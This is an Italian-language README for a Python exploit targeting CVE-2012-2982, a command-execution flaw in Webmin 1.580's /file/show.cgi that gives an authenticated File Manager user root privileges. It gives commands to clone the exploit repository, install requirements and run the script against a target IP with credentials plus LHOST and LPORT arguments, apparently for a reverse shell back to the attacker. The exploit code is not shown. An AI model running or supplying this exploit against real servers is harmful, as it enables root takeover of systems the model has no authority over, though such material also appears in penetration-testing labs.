
Exploit Python per CVE-2012-2982
Questo script Python è scritto per una vulnerabilità in Webmin 1.580, CVE-2012-2982. La vulnerabilità esiste nel componente /file/show.cgi e permette a un utente autenticato, con accesso al modulo File Manager, di eseguire comandi arbitrari con privilegi di root.
Versione Python testata: Python 3.8.5
Pacchetto pip richiesto: secrets
git clone https://github.com/OstojaOfficial/CVE-2012-2982.git
pip3 install -r requirements.txt
Per eseguire l'exploit usa il comando qui sotto:
python3 exploit.py <IP> <Username> <Password> <LHOST> <LPORT>